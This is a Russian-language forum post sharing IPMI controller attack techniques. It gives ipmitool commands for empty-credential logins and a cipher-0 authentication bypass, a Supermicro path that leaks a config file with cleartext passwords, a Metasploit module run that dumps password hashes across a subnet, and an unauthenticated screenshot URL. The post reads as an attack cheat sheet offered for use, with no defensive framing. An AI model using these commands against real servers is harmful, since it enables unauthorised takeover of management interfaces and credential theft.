Показать сообщение отдельно

  #4  
Старый 07.08.2017, 20:08
SooLFaa
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами: 6398966

Репутация: 154


По умолчанию

Ещё немного в кассу уязвимости ipmi

* Cleartext: ipmitool -H -U "" -P "" user list 1 - пустой пароль пустой логин, может дать доступ

* AUth bypass Cipher 0: выполнить команды без аутентификации

Код:
ipmitool -U ADMIN -P "1223" -C 0 -H  lan print 1
или

Код:
ipmitool -I lanplus -U ADMIN -P "1223" -C 0 -H  lan print 1
- Пароль любой

* Обратившись на порт T:49152 на URL "/PSBlock" можно скачать конфигурационный файл 'XXXX_bmc.conf', содержащий пароли в открытом виде. Преимущественно подвержены Supermicro Onboard IPMI контроллеры.

* в спецификации IPMI 2.0 заложена возможность вытащить и брутить хеши паролей (которые используют уязвимые sha1 и md5) от всех учеток через 623 порт UDP

Код:
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.0.0.0/24
set THREADS 256
run
* Последний скрин можно глянуть без аутентификации по пути

http://IP-OF-IPMI/images/Snapshot.bmp
 
Ответить с цитированием